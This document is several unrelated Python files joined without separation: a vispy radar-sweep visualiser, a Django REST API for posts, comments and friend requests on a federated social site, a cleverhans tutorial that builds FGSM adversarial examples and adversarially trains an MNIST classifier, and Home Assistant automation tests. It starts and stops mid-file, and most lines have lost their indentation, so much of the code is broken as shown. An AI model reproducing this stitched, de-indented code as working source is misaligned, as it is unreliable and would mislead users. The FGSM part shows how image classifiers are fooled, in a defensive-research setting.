                                 (len(radar_latlons) != num_radars)):
            print("ERROR: Must provide filenames and lat-lons for each radar!")
            return
# Prepare some variables if two radars are chosen
self.radar_filenames = radar_filenames
self.t_start = time_start
self.t_end = time_end
self.rnum = num_radars
self.loop_dt = np.timedelta64(loop_step * 1000000000, 'ns')
self.loop_duration = np.timedelta64(image_duration * 1000000000, 'ns')
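        # loop_step and image_duration are given in seconds; store them as
        # nanosecond timedelta64 values to match the datetime64 times used in
        # loop_reset()/loop_radar().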
# Read in the radar files into a collection
self.rfc = []
for ii in range(self.rnum):
self.rfc.append(RadarFileCollection(self.radar_filenames[ii]))
## self.rfc = RadarFileCollection(filenames)
self.rfc_88d = RadarFileCollection(filenames_88d)
# Initialize variables for later use
self.dx, self.dy = [], []
if radar_fields is None:
self.radar_fields = ['reflectivity']
else:
self.radar_fields = [radar_fields[0]]
# Find corner points if required
if len(radar_latlons) > 1:
for num in range(1, len(radar_latlons)):
dx_tmp, dy_tmp = corner_to_point(radar_latlons[num], radar_latlons[num-1]) #meters
self.dx.append(dx_tmp)
self.dy.append(dy_tmp)
                try:
                    self.radar_fields.append(radar_fields[num])
                except (IndexError, TypeError):
                    # fall back when radar_fields is missing an entry or is None
                    self.radar_fields.append('reflectivity')
# Generate dummy data to initialize the Mesh instance
x, y, z, d = radar_example_data()
# print x.shape, y.shape, z.shape
# print d.shape, d.min(), d.max()
mesh = self._init_mesh(x, y, z, d)
mesh_88d = self._init_mesh(x, y, z, d)
# Use colormapping class from matplotlib
self.DZcm = ScalarMappable(norm=Normalize(-25,80), cmap='gist_ncar')
self.VRcm = ScalarMappable(norm=Normalize(-32,32), cmap='PuOr_r')
self.SWcm = ScalarMappable(norm=Normalize(0.0,5.0), cmap='cubehelix_r')
self.radar_mesh = mesh
self.mesh_88d = mesh_88d
self.meshes = (mesh, mesh_88d)
self.rot_view = None
vispy.scene.SceneCanvas.__init__(self, keys='interactive',
title=name, size=size, show=True)
view = self.central_widget.add_view()
view.camera = 'turntable'
view.camera.mode = 'ortho'
view.camera.up = 'z'
view.camera.distance = 20
self.rot_view = view
for a_mesh in self.meshes:
self.rot_view.add(a_mesh)
self.unfreeze() # allow addition of new attributes to the canvas
self.t1 = Text('Time', parent=self.scene, color='white')
self.t1.font_size = 18
self.t1.pos = self.size[0] // 2, self.size[1] // 10
self.loop_reset()
self.timer = vispy.app.Timer(connect=self.loop_radar)
self.timer.start(timer_interval)
def _init_mesh(self, x,y,z,d):
verts, faces = mesh_from_quads(x,y,z)
face_colors = np.empty((faces.shape[0], 4))
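        # mesh_from_quads presumably emits two triangle faces per quad, so the
        # same data value is written to both the even- and odd-indexed faces.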
face_colors[0::2,0] = d.flat
face_colors[0::2,1] = d.flat
face_colors[0::2,2] = d.flat
face_colors[1::2,0] = d.flat
face_colors[1::2,1] = d.flat
face_colors[1::2,2] = d.flat
face_colors[:,3] = 1.0 # transparency
mdata = MeshData(vertices=verts, faces=faces, face_colors=face_colors)
mesh = Mesh(meshdata=mdata)
# mesh.transform = ChainTransform([STTransform(translate=(0, 0, 0),
# scale=(1.0e-3, 1.0e-3, 1.0e-3) )])
mesh.transform = vispy.scene.transforms.MatrixTransform()
mesh.transform.scale([1./1000, 1./1000, 1./1000])
# mesh.transform.shift([-.2, -.2, -.2])
return mesh
def loop_reset(self):
if self.t_start is not None:
self.loop_start = self.t_start
else:
self.loop_start = np.datetime64(np.min(self.rfc[0].times.values()), 'ns')
if self.t_end is not None:
self.loop_end = self.t_end
else:
self.loop_end = np.datetime64(np.max(self.rfc[0].times.values()), 'ns')
self.loop_current = self.loop_start
def loop_radar(self, event):
current = self.loop_current
last = current
print(current)
self.loop_current = current + self.loop_dt
# ----- Do Ka data -----
# ka_field = 'spectrum_width'
# # ka_field = 'reflectivity'
# r,az,el,t,data = self.rfc.sweep_data_for_time_range(current,
# current+self.loop_duration,
# fieldnames=(ka_field,))
# if r is not None:
# if np.abs(az.mean() - 315.0) > 10:
# az += 90.0
# d = data[ka_field][1:-1, 1:-150]
#
# # print "Found Ka", r.shape, az.shape, el.shape, d.shape
# # print r.min(), r.max(), el.min(), el.max(), az.min(), az.max(), d.min(), d.max()
# verts, faces, face_colors = self._make_plot(r[1:-150], az[1:-1], el[1:-1],
# # d, vmin=-32.0, vmax=25.0, cm=self.DZcm,
# d, vmin=-1.0, vmax=5.0, cm=self.SWcm,
# dx=-dx_ka, dy=-dy_ka)
#
# # print('vert range', verts.min(), verts.max())
#
# self.radar_mesh.set_data(vertices=verts, faces=faces, face_colors=face_colors)
# ----- Do 88D data -----
for ii in range(self.rnum):
            r, az, el, t, data = self.rfc[ii].sweep_data_for_time_range(
                current, current + self.loop_duration,
                fieldnames=(self.radar_fields[ii],))
if r is not None:
if (el.mean() < 2.0):
d = data[self.radar_fields[ii]][1:-1, 1:300]
# print "Found 88D", r.shape, az.shape, el.shape, d.shape
# print r.min(), r.max(), el.min(), el.max(), az.min(), az.max(), d.min(), d.max()
verts, faces, face_colors = self._make_plot(
r[1:300], az[1:-1], el[1:-1],
d, vmin=-25.0, vmax=80.0, cm=self.DZcm)
# d, vmin=0.0, vmax=0.4, cm=self.SWcm)
# d, vmin=-32.0, vmax=32.0, cm=self.VRcm)
self.mesh_88d.set_data(vertices=verts, faces=faces, face_colors=face_colors)
face_colors[:,3] = 0.5
# ----- Update plot -----
self.t1.text='{0} UTC'.format(current)
# for m in self.meshes:
# m._program._need_build = True
self.update()
if last>self.loop_end:
self.loop_reset()
def _make_plot(self, r, az, el, d, vmin=-32, vmax=70, dx=0.0, dy=0.0, cm=None):
""" Data are normalized using the min of the data array
after replacing missing values with vmin, so vmin should be less
than the minimum data value
"""
x, y, z = antenna_vectors_to_cartesian(r, az, el, edges=True)
x += dx
y += dy
# print(x.shape, y.shape, z.shape, d.shape)
verts, faces = mesh_from_quads(x, y, z)
squashed = d.filled(vmin).flatten()
face_colors = np.empty((faces.shape[0], 4))
if cm is None:
squashed -= squashed.min()
squashed /= (vmax-vmin) # squashed.max()
# print squashed.min(), squashed.max()
# print(face_colors[0::2,0].shape, squashed.shape)
face_colors[0::2, 0] = squashed # d.flat
face_colors[0::2, 1] = squashed # d.flat
face_colors[0::2, 2] = squashed # d.flat
face_colors[1::2, 0] = squashed # d.flat
face_colors[1::2, 1] = squashed # d.flat
face_colors[1::2, 2] = squashed # d.flat
face_colors[:, 3] = 1.0 # transparency
else:
colors = cm.to_rgba(squashed)
face_colors[0::2] = colors
face_colors[1::2] = colors
return verts, faces, face_colors
def on_draw(self, ev):
gloo.set_clear_color('black')
gloo.clear(color=True, depth=True, stencil=True)
if self.rot_view is not None:
self.draw_visual(self.rot_view)
self.draw_visual(self.t1)
# for mesh in self.meshes:
# print mesh
# self.draw_visual(mesh)
if __name__ == '__main__':
#-------------------
# Selection of interesting times
#-------------------
# filenames = glob.glob('/data/20140607/Ka2/Ka2140608031*')#[5:10]
# filenames_88d = glob.glob('/data/20140607/88D/KLBB20140608_031*')
# t_start = np.datetime64('2014-06-08T03:16:29Z', 'ns')
# filenames = glob.glob('/data/20140607/Ka2/Ka2140608033*')#[5:10]
# filenames_88d = glob.glob('/data/20140607/88D/KLBB20140608_033*')
# t_start = np.datetime64('2014-06-08T03:39:05Z', 'ns')
# t_end = t_start
# timer_interval = 10.0
#-------------------
#
#
# filenames = glob.glob('/data/20140607/Ka2/Ka2140608034*')#[5:10]
# filenames_88d = glob.glob('/data/20140607/88D/KLBB20140608_034*')
# t_start = np.datetime64('2014-06-08T03:40:00Z', 'ns')
# t_end = np.datetime64('2014-06-08T03:50:00Z', 'ns')
#-------------------
filenames = glob.glob('/Users/guy/data/test/brawl_vispy/Ka2/Ka2140608031*')#[5:10]
filenames_88d = glob.glob('/Users/guy/data/test/brawl_vispy/88D/KLBB20140608_031*')
## t_start = datetime.datetime(2014,6,8,3,10,0)
## t_end = datetime.datetime(2014,6,8,3,20,0)
t_start = np.datetime64('2014-06-08T03:10:00Z', 'ns')
t_end = np.datetime64('2014-06-08T03:20:00Z', 'ns')
# dloop, dimage = 10, 10
canvas = Canvas(
radar_filenames=[filenames_88d],
radar_latlons=[(33.654140472412109, -101.81416320800781),
(33.73732, -101.84326)],
time_start=t_start, time_end=t_end,
## loop_step=dloop, image_duration=dimage
)
vispy.app.run()
# canvas.radar_mesh.set_data(self, vertices=None, faces=None, vertex_colors=None, face_colors=None, meshdata=None, color=None)
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import mixins,generics, status, permissions
from .serializers import AuthorSerializer,PostSerializer,CommentSerializer,PostPagination,CommentPagination,AddCommentQuerySerializer
from rest_framework.decorators import api_view
from .permissions import IsAuthenticatedNodeOrAdmin
from collections import OrderedDict
from .settings import MAXIMUM_PAGE_SIZE,HOST_NAME,PROJECT_ROOT
from .models import Author,Post, friend_request, Comment,Notify,Friend,PostImages,Node
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404,get_list_or_404
import uuid,json, requests
from django.http import Http404
from rest_framework.renderers import JSONRenderer
from .comment_functions import getNodeAuth,getNodeAPIPrefix,friend_relation_validation,author_id_parse
import base64
# ============================================= #
# ============= Posts API (START) ============= #
# ============================================= #
def handle_posts(posts,request):
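    # Paginate the given posts, attach up to the five most recent comments to
    # each post, rewrite author ids as URLs, and return a paginated response.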
size = int(request.GET.get('size', MAXIMUM_PAGE_SIZE))
#======
#littleAuthor = Author.objects.get(user=request.user)
try:
littleNode = Node.objects.get(user=request.user)
except Node.DoesNotExist:
littleNode = None
#======
paginator = PostPagination()
images = []
paginator.page_size = size
result_posts = paginator.paginate_queryset(posts, request)
for post in result_posts:
comments = Comment.objects.filter(post=post).order_by('-published')[:5]
for c in comments.all() :
c.author.id = c.author.url
post['comments'] = comments
post['count'] = comments.count()
post['size'] = MAXIMUM_PAGE_SIZE
post['next'] = post.origin + 'comments/'
post['categories'] = json.loads(post.categories)
post['visibleTo'] = json.loads(post.visibleTo)
post['author'].id = post['author'].url
        if littleNode is not None:
            if not littleNode.shareImage:
if post['contentType'] == 'text/markdown':
post['content'] = post['content'].split('![]')[0]
#============= image
# if post['contentType'] == 'image/png;base64' or post['contentType'] == 'image/jpeg;base64':
# path = PostImages.objects.filter(post=Post.objects.get(id=post['id']))[0].post_image.url
# #post['content'] = base64.b64encode(pimage)
# path = PROJECT_ROOT + path
# fp=open(path,'r+')
# if post['contentType'] == 'image/png;base64':
# post['content'] = "data:image/png;base64, " + base64.b64encode(fp.read())
# if post['contentType'] == 'image/jpeg;base64':
# post['content'] = "data:image/jpeg;base64, " + base64.b64encode(fp.read())
# fh = open("imageToSave.jpeg", "wb")
# fh.write(base64.b64decode(post['content']))
# fh.close()
#============= image
serializer = PostSerializer(result_posts, many=True)
#============= image
#============= image
return paginator.get_paginated_response(serializer.data, size)
class Public_Post_List(APIView):
"""
    List all public posts
"""
queryset = Post.objects.filter(visibility='PUBLIC').filter(temp=False)
def get(self,request,format=None):
return handle_posts(self.queryset,request)
class Post_Detail(APIView):
"""
List one post with given post id
"""
queryset = Post.objects.all()
def failResponse(self, err_message, status_code):
# generate fail response
response = OrderedDict()
response["query"] = "getPost"
response["success"] = False
response["message"] = err_message
return Response(response, status=status_code)
# return Response(JSONRenderer().render(response), status=status_code)
def get(self,request,post_id,format=None):
posts = get_list_or_404(Post.objects.filter(temp=False),pk=post_id)
return handle_posts(posts,request)
def post(self, request, post_id, format=None):
data = request.data
# request data fields checking
try:
temp_field = data["friends"]
except KeyError:
return self.failResponse(
"Friend list not provided.",
status.HTTP_400_BAD_REQUEST
)
# HOST_NAME
# error handling
# if not (data["query"] == "getPost"):
# return Response(status=status.HTTP_400_BAD_REQUEST)
# if not (data["postid"] == post_id):
# return self.failResponse(
# "The post id in body is different then the post id in url",
# status.HTTP_400_BAD_REQUEST
# )
# get the requested post
post = get_object_or_404(Post.objects.filter(temp=False), pk=post_id)
# get possible FOAF
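        # FOAF check: intersect the post author's follow list with the friend
        # list supplied by the requester, then ask each candidate "middle"
        # friend's server whether it in turn follows the post author back.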
post_author_following_list = Friend.objects.filter(requester=post.author)
possible_middle_friends = post_author_following_list.filter(requestee_id__in=data["friends"])
# request following list from remote server and compare
is_FOAF = False
for middle_friend in possible_middle_friends:
r = requests.get(middle_friend.requestee+'friends')
remote_following_list = r.json()
if post.author.id in remote_following_list:
is_FOAF = True
break
# response
if is_FOAF:
posts = get_list_or_404(Post, pk=post_id)
return handle_posts(posts,request)
else:
return self.failResponse(
"Requester is not FOAF",
status.HTTP_401_UNAUTHORIZED
)
class All_Visible_Post_List_To_User(APIView):
"""
List all posts that visible to an authenticated user.
"""
queryset = Post.objects.exclude(visibility='SERVERONLY').filter(temp=False)
def get(self,request, format=None):
return handle_posts(self.queryset,request)
class All_Visible_Post_List_From_An_Author_To_User(APIView):
"""
List all posts from an author that visible to an authenticated user.
"""
queryset = Post.objects.exclude(visibility='SERVERONLY').filter(temp=False)
def get(self,request, author_id, format=None):
        author = get_object_or_404(Author.objects.filter(temp=False), pk=author_id)
posts=self.queryset.filter(author = author_id)
return handle_posts(posts,request)
# ============== Posts API (END) ============== #
# ============================================= #
# =========== Comments API (START) ============ #
# ============================================= #
class Comment_list(APIView):
"""
List all comments, or create a new comment.
"""
queryset = Comment.objects.all()
def get(self,request,post_id,format=None):
post = get_object_or_404(Post.objects.filter(temp=False),pk=post_id)
size = int(request.GET.get('size', 5))
paginator = CommentPagination()
paginator.page_size = size
Comments = Comment.objects.filter(post=post_id)
result_comments = paginator.paginate_queryset(Comments, request)
for c in result_comments:
#post['author'].id = post['author'].url
c.author.id = c.author.url
serializer = CommentSerializer(result_comments, many=True)
return paginator.get_paginated_response(serializer.data, size)
def post(self,request,post_id,format=None):
response = OrderedDict()
response['query'] = 'addComment'
data = request.data
serializer = AddCommentQuerySerializer(data=data)
if serializer.is_valid():
serializer.save()
response['success'] = True
response['message'] = 'Comment Added'
code = status.HTTP_200_OK
else:
response['success'] = False
response['message'] = serializer.errors
code = status.HTTP_400_BAD_REQUEST
return Response(response,status=code)
# ============ Comments API (END) ============= #
# ============================================= #
# ============ Profile API (START) ============ #
# ============================================= #
class AuthorView(APIView):
queryset = Author.objects.all()
def get(self, request, author_id, format=None):
author1 = get_object_or_404(Author,pk=author_id)
serializer = AuthorSerializer(author1)
author = serializer.data
author['id'] = author['url']
author['friends'] = []
followlist = author1.follow.all()
for i in followlist :
serializer = AuthorSerializer(Author.objects.get(id=author_id_parse(i.requestee_id)))
j = serializer.data
j['id'] = j['url']
author['friends'].append(j)
return Response(author)
# ============= Profile API (END) ============= #
# ============================================= #
# ============ Friend API (START) ============= #
# ============================================= #
#@api_view(['POST'])
#def handle_friendrequest(request,format=None):
# queryset = Notify.objects.all()
# if (request.method == 'POST'):
# data = request.data
# if not (data[query] == "friendrequest"):
# return Response(status=status.HTTP_400_BAD_REQUEST)
# try:
# friend = Author.objects.get(data[friend][id])
# except Author.DoesNotExist:
# return Response(status=status.HTTP_400_BAD_REQUEST)
# new_notify = Notify.objects.create(friend,data[author][url])
# new_notify.save()
class Friend_Inquiry_Handler(APIView):
"""
return all friends with a given author.
"""
queryset = Friend.objects.all()
def successResponse(self, author_id, friend_list):
# generate success response
response = OrderedDict()
response["query"] = "friends"
response["author"] = author_id
response["authors"] = friend_list
return Response(response, status=status.HTTP_200_OK)
def failResponse(self, err_message, status_code):
# generate fail response
response = OrderedDict()
response["query"] = "friends"
response["success"] = False,
response["message"] = err_message
return Response(response, status=status_code)
def get(self, request, author_id, format=None):
# pull all the following author by author_id
friends = Friend.objects.filter(requester=author_id)
# store author ids in a list
result = []
for friend in friends:
# if friend.requestee_host == HOST_NAME:
# friend.requestee_host = friend.requestee_host + '/service/'
# if friend.requestee_host[-1] != '/':
# friend.requestee_host = friend.requestee_host + '/'
# print(friend.requestee_id)
# result.append(friend.requestee_host + 'author/' + friend.requestee_id)
result.append(friend.requestee)
# return success response
return self.successResponse(HOST_NAME + '/service/author/' + author_id, result)
def post(self,request, author_id, format=None):
data = request.data
# error handling TODOXXX
if not (data["query"] == "friends"):
return Response(status=status.HTTP_400_BAD_REQUEST)
if not (data["author"] == author_id):
return self.failResponse(
"The author id in body is different then the author id in url",
status.HTTP_400_BAD_REQUEST)
# proceeds matching
inquiry_friend_list = data["authors"]
result = []
for friend_id in inquiry_friend_list:
try:
queryset = Friend.objects.filter(requester=author_id)
queryset.get(requestee_id=friend_id)
except Friend.DoesNotExist:
continue
else:
result.append(friend_id)
# return success response
return self.successResponse(data["author"], result)
class Accurate_Friend_Inquiry_Handler(APIView):
"""
handle friend inquiry between two authors.
"""
queryset = Friend.objects.all()
def get(self, request, author_id1, author_id2, format=None):
# prepare response
response = OrderedDict()
response["query"] = "friends"
response["authors"] = [author_id1, author_id2]
response["friends"] = True
        # pull author info; unknown authors cannot be friends
        try:
            author1 = Author.objects.get(id=author_id1)
            author2 = Author.objects.get(id=author_id2)
        except Author.DoesNotExist:
            response["friends"] = False
            return Response(response, status=status.HTTP_200_OK)
friend_validation_result = friend_relation_validation(author1.url, author1.host, author2.url, author2.host)
if friend_validation_result["success"]:
response["friends"] = friend_validation_result["friend_status"]
# print "==================="
# print(response["friends"])
else:
response["friends"] = False
            print(friend_validation_result["messages"])
"""
# pull all the following author by author_id
following_1 = Friend.objects.filter(requester=author_id1)
following_2 = Friend.objects.filter(requester=author_id2)
# two way matches tests, true friend will need to pass both tests
try:
following_1.get(requestee_id=author_id2)
except Friend.DoesNotExist:
response["friends"] = False
try:
following_2.get(requestee_id=author_id1)
except Friend.DoesNotExist:
response["friends"] = False
"""
# return response
return Response(response, status=status.HTTP_200_OK)
class Friendrequest_Handler(APIView):
"""
Handle all friend requests
"""
queryset = Notify.objects.all()
def post(self,request,format=None):
# data = json.loads(request.data)
data = request.data
# print(data)
if not (data["query"] == "friendrequest"):
return Response(status=status.HTTP_400_BAD_REQUEST)
try:
data["friend"]["id"] = author_id_parse(data["friend"]["id"])
data["author"]["id"] = author_id_parse(data["author"]["id"])
friend = Author.objects.get(id=data["friend"]["id"])
            # redundant Notify check
varify_result = Notify.objects.all()
varify_result = varify_result.filter(requester=data["author"]["url"])
varify_result = varify_result.filter(requester_id = author_id_parse(data["author"]["id"]))
varify_result = varify_result.filter(requestee=friend)
            # check whether the requestee has already followed the requester
f_varify_result = Friend.objects.all()
f_varify_result = f_varify_result.filter(requestee=data["author"]["url"])
f_varify_result = f_varify_result.filter(requestee_id=author_id_parse(data["author"]["id"]))
f_varify_result = f_varify_result.filter(requester=friend)
if(len(varify_result)<1 and len(f_varify_result)<1):
new_notify = Notify.objects.create(requestee=friend,
requester=data["author"]["url"],
requester_displayName=data["author"]["displayName"],
requester_host = data["author"]["host"],
requester_id = author_id_parse(data["author"]["id"]))
new_notify.save()
except Author.DoesNotExist:
raise Http404
else:
response = OrderedDict()
response["query"] = "friendrequest"
response["success"] = True
response["message"] = "Friend request sent"
return Response(response, status=status.HTTP_200_OK)
# ============= Friend API (END) ============== #
"""
This tutorial shows how to generate adversarial examples using FGSM
and train a model using adversarial training with TensorFlow.
It is very similar to mnist_tutorial_keras_tf.py, which does the same
thing but with a dependence on keras.
The original paper can be found at:
https://arxiv.org/abs/1412.6572
"""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import numpy as np
import tensorflow as tf
from cleverhans.compat import flags
from cleverhans.loss import CrossEntropy
from cleverhans.dataset import MNIST
from cleverhans.utils_tf import model_eval
from cleverhans.train import train
from cleverhans.attacks import FastGradientMethod
from cleverhans.utils import AccuracyReport, set_log_level
from cleverhans.model_zoo.basic_cnn import ModelBasicCNN
FLAGS = flags.FLAGS
NB_EPOCHS = 6
BATCH_SIZE = 128
LEARNING_RATE = 0.001
CLEAN_TRAIN = True
BACKPROP_THROUGH_ATTACK = False
NB_FILTERS = 64
def mnist_tutorial(
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
nb_epochs=NB_EPOCHS,
batch_size=BATCH_SIZE,
learning_rate=LEARNING_RATE,
clean_train=CLEAN_TRAIN,
testing=False,
backprop_through_attack=BACKPROP_THROUGH_ATTACK,
nb_filters=NB_FILTERS,
num_threads=None,
label_smoothing=0.1,
):
"""
MNIST cleverhans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param clean_train: perform normal training on clean examples only
before performing adversarial training.
:param testing: if true, complete an AccuracyReport for unit tests
to verify that performance is adequate
:param backprop_through_attack: If True, backprop through adversarial
example construction process during
adversarial training.
:param label_smoothing: float, amount of label smoothing for cross entropy
:return: an AccuracyReport object
"""
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
# Set logging level to see debug information
set_log_level(logging.DEBUG)
# Create TF session
    if num_threads:
        config_args = dict(intra_op_parallelism_threads=num_threads)
    else:
        config_args = {}
sess = tf.Session(config=tf.ConfigProto(**config_args))
# Get MNIST data
mnist = MNIST(
train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end,
)
x_train, y_train = mnist.get_set("train")
x_test, y_test = mnist.get_set("test")
# Use Image Parameters
img_rows, img_cols, nchannels = x_train.shape[1:4]
nb_classes = y_train.shape[1]
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, img_rows, img_cols, nchannels))
y = tf.placeholder(tf.float32, shape=(None, nb_classes))
# Train an MNIST model
train_params = {
"nb_epochs": nb_epochs,
"batch_size": batch_size,
"learning_rate": learning_rate,
}
eval_params = {"batch_size": batch_size}
fgsm_params = {"eps": 0.3, "clip_min": 0.0, "clip_max": 1.0}
rng = np.random.RandomState([2017, 8, 30])
def do_eval(preds, x_set, y_set, report_key, is_adv=None):
acc = model_eval(sess, x, y, preds, x_set, y_set, args=eval_params)
setattr(report, report_key, acc)
if is_adv is None:
report_text = None
elif is_adv:
report_text = "adversarial"
else:
report_text = "legitimate"
if report_text:
print("Test accuracy on %s examples: %0.4f" % (report_text, acc))
if clean_train:
model = ModelBasicCNN("model1", nb_classes, nb_filters)
preds = model.get_logits(x)
loss = CrossEntropy(model, smoothing=label_smoothing)
def evaluate():
do_eval(preds, x_test, y_test, "clean_train_clean_eval", False)
train(
sess,
loss,
x_train,
y_train,
evaluate=evaluate,
args=train_params,
rng=rng,
var_list=model.get_params(),
)
# Calculate training error
if testing:
do_eval(preds, x_train, y_train, "train_clean_train_clean_eval")
# Initialize the Fast Gradient Sign Method (FGSM) attack object and
# graph
fgsm = FastGradientMethod(model, sess=sess)
adv_x = fgsm.generate(x, **fgsm_params)
preds_adv = model.get_logits(adv_x)
# Evaluate the accuracy of the MNIST model on adversarial examples
do_eval(preds_adv, x_test, y_test, "clean_train_adv_eval", True)
# Calculate training error
if testing:
do_eval(preds_adv, x_train, y_train, "train_clean_train_adv_eval")
print("Repeating the process, using adversarial training")
# Create a new model and train it to be robust to FastGradientMethod
model2 = ModelBasicCNN("model2", nb_classes, nb_filters)
fgsm2 = FastGradientMethod(model2, sess=sess)
def attack(x):
return fgsm2.generate(x, **fgsm_params)
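# Passing the attack to CrossEntropy makes the training loss incorporate
# adversarial examples generated on the fly, which is what implements the
# adversarial training here.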
loss2 = CrossEntropy(model2, smoothing=label_smoothing, attack=attack)
preds2 = model2.get_logits(x)
adv_x2 = attack(x)
if not backprop_through_attack:
# For the fgsm attack used in this tutorial, the attack has zero
# gradient so enabling this flag does not change the gradient.
# For some other attacks, enabling this flag increases the cost of
# training, but gives the defender the ability to anticipate how
# the attacker will change their strategy in response to updates to
# the defender's parameters.
adv_x2 = tf.stop_gradient(adv_x2)
preds2_adv = model2.get_logits(adv_x2)
def evaluate2():
# Accuracy of adversarially trained model on legitimate test inputs
do_eval(preds2, x_test, y_test, "adv_train_clean_eval", False)
# Accuracy of the adversarially trained model on adversarial examples
do_eval(preds2_adv, x_test, y_test, "adv_train_adv_eval", True)
# Perform and evaluate adversarial training
train(
sess,
loss2,
x_train,
y_train,
evaluate=evaluate2,
args=train_params,
rng=rng,
var_list=model2.get_params(),
)
# Calculate training errors
if testing:
do_eval(preds2, x_train, y_train, "train_adv_train_clean_eval")
do_eval(preds2_adv, x_train, y_train, "train_adv_train_adv_eval")
return report
def main(argv=None):
"""
Run the tutorial using command line flags.
"""
from cleverhans_tutorials import check_installation
check_installation(__file__)
mnist_tutorial(
nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
clean_train=FLAGS.clean_train,
backprop_through_attack=FLAGS.backprop_through_attack,
nb_filters=FLAGS.nb_filters,
)
if __name__ == "__main__":
flags.DEFINE_integer("nb_filters", NB_FILTERS, "Model size multiplier")
flags.DEFINE_integer("nb_epochs", NB_EPOCHS, "Number of epochs to train model")
flags.DEFINE_integer("batch_size", BATCH_SIZE, "Size of training batches")
flags.DEFINE_float("learning_rate", LEARNING_RATE, "Learning rate for training")
flags.DEFINE_bool("clean_train", CLEAN_TRAIN, "Train on clean examples")
flags.DEFINE_bool(
"backprop_through_attack",
BACKPROP_THROUGH_ATTACK,
(
"If True, backprop through adversarial example "
"construction process during adversarial training"
),
)
tf.app.run()
|
|
"""The test for state automation."""
from datetime import timedelta
from unittest.mock import patch
import pytest
import homeassistant.components.automation as automation
from homeassistant.components.homeassistant.triggers import state as state_trigger
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, SERVICE_TURN_OFF
from homeassistant.core import Context
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
assert_setup_component,
async_fire_time_changed,
async_mock_service,
mock_component,
)
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
hass.states.async_set("test.entity", "hello")
async def test_if_fires_on_entity_change(hass, calls):
"""Test for firing on entity change."""
context = Context()
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.entity"},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
assert calls[0].data["some"] == "state - test.entity - hello - world - None"
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.states.async_set("test.entity", "planet")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_from_filter(hass, calls):
"""Test for firing on entity change with filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_to_filter(hass, calls):
"""Test for firing on entity change with no filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_attribute_change_with_to_filter(hass, calls):
"""Test for not firing on attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", {"test_attribute": 11})
hass.states.async_set("test.entity", "world", {"test_attribute": 12})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters are a non match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_if_to_filter_not_match(hass, calls):
"""Test for not firing if to filter is not a match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "moon")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_from_filter_not_match(hass, calls):
"""Test for not firing if from filter is not a match."""
hass.states.async_set("test.entity", "bye")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_entity_not_match(hass, calls):
"""Test for not firing if entity is not matching."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.another_entity"},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
